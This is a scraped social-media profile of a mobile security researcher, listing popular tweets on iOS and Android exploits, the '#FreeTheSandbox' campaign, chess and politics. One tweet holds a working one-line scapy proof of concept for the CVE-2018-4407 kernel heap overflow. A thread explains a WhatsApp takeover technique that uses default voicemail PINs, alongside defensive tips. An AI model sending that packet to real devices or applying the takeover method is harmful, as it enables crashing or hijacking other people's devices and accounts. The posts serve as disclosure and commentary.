Zuk
@ihackbanme
Followers
17K
Following
10K
Media
499
Statuses
10K
Mobile & Security Research | Founder @ZecOps (Acq. by JAMF) 🐊 & @ZIMPERIUM (Acq.) | #FreeTheSandbox✌ | ❤️ Chess | My random thoughts, only some are accurate.
Joined December 2009
The recent WhatsApp accounts takeover is simple and genius. This is how it works:.You're sleeping. A "hacker" tries to login to your account via WhatsApp. You get a text message with a pincode that says "Do not share this". You don't share it, yet you still get hacked. How?.
109
2K
5K
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:.pip install scapy.sudo scapy .send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)])).
30
772
2K
The author of this post found the SolarWinds attack a 2-3 months before FireEye's announcement on December 8th 🤯
8
258
1K
How to avoid this WhatsApp account takeover?.1. Make sure that your voicemail pincode is not the default pincode. 2. Setup 2FA pincode on your WhatsApp.
35
128
906
Next, the attackers check your voicemail simply by trying the default pincode which is the last four digits of your cellphone number in many carriers. Then they can log in to YOUR WhatsApp.
18
53
699
The attacker clicks on the option that the SMS didn't arrive and asks for a verification by phone. WhatsApp call you. You're sleeping. It goes to Voicemail. The voicemail stores the automated voice with the pincode that the attackers are trying to obtain.
10
43
533
I'm sure that @Apple will give bootrom exploits more thinking and understand that checkm8-style exploits will happen eventually. SOLUTION: avoid embarrassment by providing an option to unlock the boot (w/ pincode). Don't fight it and lose - #FreeTheSandbox and WIN!.
3
60
514
After logging in, they setup a 2FA pincode on your Whatsapp to prevent you from logging back in. WhatsApp account recovery process takes several days - during this time they ask for $ from your contacts or spread malware.
6
29
479
So I’m telling @anishgiri what’s my Chess username (TheJourneyToIM) and Anish looks on my stats and says - you should have called it “I’m The Journey” 😂🤦♂️w/ @rpragchess @Rameshchess
5
7
424
Apple's latest responses collection:.1. Barking at Google Project 0 for the water hole spray attacks leveraging 14 vulnerabilities. 2. Trying to acquire Correlium and then suing them.3. DMCA against tweets and Reddit posts (?!).This is not a trend. A thread.
11
67
405
Google and Apple will soon realize that Checkm8-style bugs are inevitable. Sandbox restrictions against device owners doesn't make sense and only benefit attackers. Let people who purchased devices to have full control and #FreeTheSandbox! Resistance is futile!
8
84
352
This dude found a kernel RCE on PS5 via the network (!!!). “Heartbleed”-like attack using an ancient bug from 2006. Disclosed via @Hacker0x01 to @Sony. This bug allows 3rd parties to clone games (!), cheat, or APTs to persist by compromising PS5/PS4. What did he get? $12.5k 🤦♂️.
Pretty cool bug! .1. Insane to see a known CVE from 2006 providing Remote kernel RW. 2. Only $12.5k ?? Not cool @Sony….
6
70
330
Kudos to all ninjas @qwertyoruiopz @s1guza @axi0mX and everyone involved. Mad skills, real OG. #checkm8 #FreeTheSandbox #GAMEOVER
9
53
307
iOS on QEMU. Super cool project: With Checkm8, and this, there's no real need for 'research devices'. The only thing left is to #FreeTheSandbox on PAC enabled prod devices and we're set.
4
109
290
These 0 click vulnerabilities that had in the wild triggers exists on iOS since (hold your breath). iOS 6!! This is one of the deepest vulnerabilities ever discovered on mobile (including Android).
5
139
283
I can confirm that the WebKit bug is indeed a 0day, and iOS 14.6 is vulnerable. Worth updating to iOS 14.6 to avoid usage of kernel N-Days in the chain. This is yet another reminder that we need to have a local-admin on our phones. #FreeTheSandbox.
Translation: IF this is real, we're going to see some ransomware / malware in iOS spreading via 1-clicks very soon. If you haven't updated by now. it's a good reminder to do so. This should also remind @Apple that device-owner need a local administrator user (#FreeTheSandbox).
6
135
276
I must be hallucinating! In HK MITM + SSL Strip works fine on gmail! This is insane. Left: victim, middle: attacker, right: ZMPR+ST Protect
8
169
280
More and more bugs in iOS allow to bypass all mitigations, and infect devices remotely. The most secure OS? Maybe. Given the circumstances, I think we deserve to validate iPhones integrity ourselves. #FreeTheSandbox.
Finally I can talk about it. iOS 14.2 remote code execution w/ PAC & APRR bypass
5
75
247
Alternative reality: Imagine that Microsoft didn't allow people to check any other folder except for c:\\Users\______\Desktop and only Microsoft and malware authors could use other folders. This is what iOS and Android are like today! Ridiculous. Device vendors: please WAKE UP!.
8
67
232
@GretaThunberg @ClausHoumann You lost all respect when you blindly backed barbarian murderers and rapists in a conflict you knew nothing about. If you only focused on climate, it would’ve yielded a more positive impact on this planet… :(. For the record: The sad “:(“ is not for you, it’s for our planet.
11
5
232
The Catalan ERC political party keeps phones outside. Shouldn't surprise anyone in Infosec. Phone vendors: it's time to adapt your strategy!
12
145
214
@GMHikaru @LevitovChess @lachesisq Quite the opposite Hikaru. What he really means is that whoever drew with you, must be either Magnus or an engine :).
1
1
223
CVE-2018-8897 (POP SS CPU bug <3). POC + Write-up: Worse than Meltdown IMO but less coverage. Maybe because it doesn't have a cool name and logo ¯\_(ツ)_/¯.#YearOfCPUBugs.
5
127
206
If anyone experienced strange, all of a sudden reboots on iPhones (esp. iOS 10.3.2 and iOS 10.3.3), please contact me privately.
71
142
193
"if they cared about security, they (@Apple) would have allowed researchers to inspect their devices" - 100% correct! #FreeTheSandbox.
@FCE365 They really are just so afraid that someone will inspect FairPlay encryption at runtime, clear out their obfuscation and burn down their monopoly in flames, aren’t they?. If they cared about security, they would allow researchers to inspect their devices.
1
30
207
iOS 15.2 is out and it is wild. Many remote and local security issues. If you care about your iPhone/iPad security you should update soon. [Source:
10
94
192
@ValZudans @davidasinclair @PeterDiamandis Claiming “dark matter is a hoax” without presenting any explanation to various issues that dark matter / energy theory tries to explain (missing mass, etc) is an “interesting” take. .
11
0
181
Looks like 0click attacks via Signal VOIP stack are happening in the wild. If the state of mobile wasn’t sad, it would have been ironically funny that folks get owned via Signal 😅. (My message to phone vendors is consistent: Open up phones for introspection asap!).
Here's a video of an unusual behavior I captured on my device Thursday last week. Note the number of "Signal Connection" (=verified) contacts I have never seen before, along with two VoIP call attempts.
10
48
176
Pretty cool bug! .1. Insane to see a known CVE from 2006 providing Remote kernel RW. 2. Only $12.5k ?? Not cool @Sony….
The PS4 (up to FW 11.00) and PS5 (up to FW 8.20) were vulnerable to CVE-2006-4304: I'll share details about successful exploitation at TyphoonCon.
4
5
175
@tim_cook Hi Tim, did you know that due to Sandbox restrictions you're *not allowed* to independently verify the integrity of your own Apple devices? This limitation helps attackers targeting iOS. We believe you understand it's a fundamental human right - please #FreeTheSandbox!.
5
43
170
@ben_finegold @32gcfhkmm @GMHikaru Let me get this straight:.A super GM, one of the best players currently, with ~2800 rating, defeated IMs/FMs and CM in 45.5 out of 46 games in an online platform in 3min games, and anyone is really challenging that?. What a waste of time and drama.
2
2
162
Wow, this went quite viral. ❤️ for everyone sharing the message and helping people to be a bit more secure. You can follow me (@ihackbanme) for more tweets about cyber security, entrepreneurship/startups, chess or other random thoughts.
7
10
156
@vxunderground Once they will see the “switch to safe boot” instructions, which can be only done manually afaik, they will realize that the damage is actually bigger. Will take weeks to fix 🤦♂️🤦♂️🤦♂️.
2
3
144
The most promising mitigation in the new iPhones already bypassed. It took many many man-years for @Arm to get PAC into iPhones. It took a week for @qwertyoruiopz to bypass. Brilliant.
5
57
137
This is mind blowing 🤯 1. For the severity of the issues the payout is small. 2. Apple's infra security is "not the best".3. I wouldn't be surprised if Apple's internal network is already compromised by multiple actors. 4. (3.) can explain a few things ;).
2
53
142
@chamath @RobinhoodApp WAIT. you didn't value their integrity during their Seed. but you kept meeting them in their Series A, AND Series B ??? So. what does it say about your integrity ???.
16
1
143
RIP @kevinmitnick. Thank you for everything. You were my childhood hero that became a friend. Thank you for everything. So many great memories. This is a picture from a lunch with @stevewoz after Defcon 2012. Kevin is in the mirror on the left side. We had a road trip from
5
8
137
@netanyahu “תיתנו פשוט את האגרופים בחזרה״ - נראה לך שככה צריך לדבר רה״מ בישראל?.שיח מבייש :(.
27
1
131
I don't understand what's the buzz about FB savings call logs? What else could one expect after granting the app with "Read call logs" permissions ?.
13
32
133
Now that iOS is becoming more than just 'mass-targeted', I have a small request. Dear @Apple, .Please allow device-owners to investigate their own device with RO FS access (provided correct pin /face recognition). This will greatly benefit the platform's security. Best next step.
What was left out of is: . The irony is anyone not on 12.3[.1] is now stuck, vulnerable to a highly reliable, cut/paste [10]0+day which exploit scavengers surely weaponize. AAPL draconian policy forbids update if < 12.4, so. wait for 12.4.1. Way to go.
3
29
129
@Isaac_Herzog אני רק רוצה לוודא שאנחנו באותו הראש:. שאתה אומר מחזות קשים אתה מתכוון למחזה שבו שר הביטחון פוטר רק כי מלא את תפקידו, רצה להתריע על סכנה, ניסה לכנס את הקבינט, סורב ומיד לאחר מכן פוטר?. שיהיה ברור: המראות הקשים הם קודם כל העדפה פוליטית אישית על פני טובת הכלל.
4
3
133
If you have Palo Alto Network firewall that is vulnerable to CVE-2017-15944, you should:.1. Stop reading twitter .2. Block the Web management from the WAN.3. Patch
7
97
128
@ArjunMahadevan It didn’t happen by accident: I agree. Is it related to the CMO that joined one year ago? No way. Fact 1: 1 year ago Netflix market cap was almost double. Fact 2: the % of Netflix internet traffic didn’t change much compared to one year ago. Meaning: this entire thread is 🤷♂️.
11
7
129
[Important thread 1/N]: Let that sink in for a second: almost all respected publications were under espionage. All the sources of journalists, were exposed. If you ever spoke to a journalist (even with "Signal"/"Whatsapp") you are exposed. THIS IS A MAJOR THREAT TO DEMOCRACY!.
[BREAKING] 180+ journalists are confirmed targets of NSO's software including: FT, CNN, NY Times, WSJ, The Economist, AP, and Reuters. @ZecOps Mobile EDR is the only tool that ever caught NSO automatically. We are offering *free* inspection for journalists to help fight back.
3
71
124
5 publicly announced jailbreaks for iOS 12+. My guess is that there are about 50+ private groups with remote exploits for latest iOS. Just couple of months ago, many said that there wouldn't be any new JB on iOS. .
iOS 12.0 - 12.1 Jailbreak Lists : . Umang Raghuvanshi - iOS 12.0 - 12.1 Jailbreak. SorryMyBad - iOS 12.0 - 12.1 Jailbreak. KeenLab - iOS 12.0 - 12.1 Jailbreak. Qwertyoruiopz - iOS 12.0 - 12.1 Jailbreak. PanguTeam - iOS 12.0 - 12.1 Jailbreak. .
4
59
125
In my opinion, there is a much better explanation to China’s ban on iPhones in Gov device. It is NOT due an economic war. If it was for an economic reason China would have banned iPhones and Macs across the entire country. They didn’t. The real reason is: cyber security.
14
26
127
@ty_johannes Brilliant. Can you check how many of the 100% games are well known theory/traps vs. complex games?.If it's a 100% in a complex game. it's weird. If it's a short 12-15 moves game, it's possible at these (& even lower) levels.
13
0
120
Unc0ver just released a jailbreak up to iOS 14.3. Great for the community. My guess is that unc0ver leveraged the kernel vulnerability that was exploited in the wild and patched on iOS 14.4 (CVE-2021-1782). Yet another example that attackers have an edge on iOS vs. defenders.
1
21
118
[blog] iOS <= 12.4.2 LPE chain on A12+ devices: Write-up + POC 👊 Happy Thanksgiving! 👊.
2
39
117
Soon. the Sandbox will be free. Smart vendors will free the sandbox voluntarily because it's the right thing to do. Others? well. we have a plan for that 🐊.#FreeTheSandbox .cc: @chronic
4
12
113
For those that think that iOS is safe because of the "walled garden" take a look at the leaked Pegasus/NSO documents here. NSO couldn't care less about the "walled garden" because they infect devices without it: silently (0-click) or click on a link (aka 1-click).
Spoiler: iOS is full of malware and remote infections too.
7
38
115
The technical details are available at: .We will release the POCs soon.
8
59
114
See below, AND: do not use anything below iOS 10.3.3 due to reasons that I'll publish soon.
Friendly reminder: Do not use iOS devices on anything below 9.3.5 as daily driver!. Will soon drop a writeup about untetherHomeDepot/jailbreak.me, which will make it trivial to replace jb payload with anything you want.
14
52
109
Today I had annoying amount of captchas. It asked to verify buses, store fronts, cars, etc. After 10-15 captchas, in the last one, I did a mistake. It still got me through. Then I realized, I wasn't doing captcha, they used me to train their supervised machine learning model 🤬🤬
14
17
107
Generic Stagefright exploit for CVE-2015-3864 released !.git clone Vulnerable % by country:
4
134
106
It’s mind blowing what brilliant people can do with the right access. @borrello_pietro developed PAC for X86 by patching Intel’s microcode!! This is pure genius. @borrello_pietro 👏👏.
2
23
109
@guyrightw @JoshBreiner אם אתה לא רואה פה בעיה שבנאדם שמרים ידיים ולא מתנגד למעצר, מקבל מכות משוטרים ללא צורך - אז הבעיה אצלך. עצוב מאוד.
4
0
99
I just published my first Medium post: “Mobile Pwn2Own 2017 Results and the Economics of Mobile Exploits”
3
60
100
Proposal: Products containing camera, microphone, or GPS, must contain a physical HW switch to disable them. Thoughts?.
19
8
100
1
3
103
Extremely thrilled to launch today. Thanks for everyone supporting this initiative. Together we will #FreeTheSandbox 👊.
3
38
95
Just got a confirmation that Zimperium zIPS detected latest iOS 10.1.1 exploit by Ian Beer without an update, again. What a rate - excited!.
1
28
94
Researching a compromised phone but not worried because it’s on airplane mode? Ha! Stealthy Cellular Access Under Fake Airplane Mode via @TheHackersNews. One more legitimate reason to enable #FreeTheSandbox.
4
41
93
ziVA: Zimperium’s iOS Video Audio Kernel Exploit
2
46
90
If you experienced any anomalies (random reboots, faster than usual battery drain, weird behavior, etc) and think that you were targeted on iPhones or iPads, I can help. DMs are open. Please spread the word.
8
46
86
Android Phones Can Get Hacked through vulnerabilities when processing PNG Images <= interesting and worth following.
4
56
86
@TarjeiJS Unpopular opinion: This is the *best* thing that happened to chess. Chess is finally getting a lot of attention, articles, and broadens the audience.
9
4
89
iOS users: remember to reboot your device occasionally. It could clean your device in case of a malware that couldn't achieve persistency.
3
51
86
Translation: IF this is real, we're going to see some ransomware / malware in iOS spreading via 1-clicks very soon. If you haven't updated by now. it's a good reminder to do so. This should also remind @Apple that device-owner need a local administrator user (#FreeTheSandbox).
3
23
84
iOS 14.2 fixed three in the wild exploited vulnerabilities, but hey, there are also 100 new emojis! Updating is highly recommended.
Apple have fixed three issues reported by Project Zero that were being actively exploited in the wild. CVE-2020-27930 (RCE), CVE-2020-27950 (memory leak), and CVE-2020-27932 (kernel privilege escalation). The security bulletin is available here:
8
29
86
It was already clear to many. The lack of local admin rights, even on managed devices, is now officially a matter of national security. "iOS zero-day let SolarWinds hackers compromise fully updated iPhones" .Reminder: It's time to #FreeTheSandbox.
0
25
83
iOS 14.5 came out with this option 👇. *seven* actively exploited zero-days were discovered in iOS in 2021 but we do not have "Allow Apps to access entire filesystem & memory" option. Priorities. Tell me more about how privacy is a fundamental human right. #FreeTheSandbox now!
4
24
82
A journalist asked me a few weeks ago: would a vendor noticed if a 10-50 million devices get hacked using a 0-click. I replied: no. He was shocked. In reality, it would be just noise in their DB - they'll miss it. As simple as that. That's why we need more eyes on smartphones.
2
14
81
I can easily imagine the following, totally made-up, conversation in Cupertino:.IR Team at Apple: “We had at least 79.6 million compromised phones by this zero-click attack”.Marketing: “no no…. We can’t say that!!! On how many continents?” .IR: “Seven. We even had an attack in.
Apple has notified people in 150 countries that they were infected with mercenary spyware (Intellexa, NSO. ). We knew spyware was global but this is next level. The market has grown tremendously since 2004, when Hacking Team was getting started.
2
14
77
Some personal news. @ZIMPERIUM is getting acquired for $0.5b. Thanks to everyone who were part of this journey 🙏
16
6
78
Oh great. Researchers showed at HITB that Android patch level is basically meaningless. Saw first glitches after Stagefright but thought that it got better with new releases. How Android Phones Hide Missed Security Updates:
2
51
72
My Keynote presentation from #HITB2021AMS "The State of Mobile Security" is now available here:
1
20
75
1. @A2nkF_ is a great 17yo researcher. 2. Now imagine what a group of skilled and financially motivated people can do over a period of 1-3 years. 3. Hopefully this exercise explain why vendors mustn't pose restrictions on researchers to analyze devices at scale.
17 yr. old Ilias (@A2nkF_), crushing macOS 🤯🤩.
1
9
76
The SolarWinds attackers used a system path to plant the malware in stage 2 (e.g. C:\Windows). On smartphones we wouldn't be able to legitimately discover such attack due to sandbox restrictions on system folders 🤦♂️🤯. I'll wrap up with the obligatory #FreeTheSandbox 👊
5
4
69
TIL: 3 Years old vulnerability in Samsung KNOX is exploited in the wild to remotely infect smartphones in South Korea. The trigger is via MITM or link. Vulnerability: PAN Blog:
1
47
70
RCE in Microsoft AttackSurfaceAnalyzer. Isn't that ironic? Don't you think?!.
Chaining Three Bugs to Get RCE in Microsoft AttackSurfaceAnalyzer.
4
18
66
@elonmusk @CommunityNotes You definitely need to bring back trust after the silly move to sell trust for $8 without an actual verification….
16
0
64
iOS 14.5 is out and (at least) CVE-2021-30661 was exploited in the wild. Reality called to remind us to #FreeTheSandbox 👊.
4
11
71
iOS 16.5 patched ColdInvite (CVE-2023-27930), comes on the heels of a previously mitigated vulnerability dubbed ColdIntro (CVE-2022-32894) that was exploited in-the-wild. Both vulnerabilities enable attackers to escape the DCP coprocessor into the AP!
1
19
71
Dear Apple, once you will let researchers help, the platform will be even more secure. Targeted folks (reporters, researchers, VIPs, anyone with access to sensitive data), CISOs, CIOs, would appreciate you even more. Be a thought leader. Just #FreeTheSandbox.
2
9
67